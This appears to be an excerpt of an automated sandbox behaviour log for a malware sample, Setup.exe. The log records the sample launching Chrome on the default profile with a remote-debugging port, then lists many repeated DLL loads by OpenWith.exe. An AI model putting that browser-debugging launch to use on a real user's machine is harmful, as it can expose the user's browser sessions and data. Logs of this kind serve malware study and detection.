        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe "C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe"
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2380,i,11729313136857741515,7979103794442491089,262144 --variations-seed-version --mojo-platform-channel-handle=2548 /prefetch:3
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2380,i,11729313136857741515,7979103794442491089,262144 --variations-seed-version --mojo-platform-channel-handle=2548 /prefetch:3Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: tiledatarepository.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: staterepository.core.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepository.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: wtsapi32.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositorycore.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: mrmcorer.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: appxdeploymentclient.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
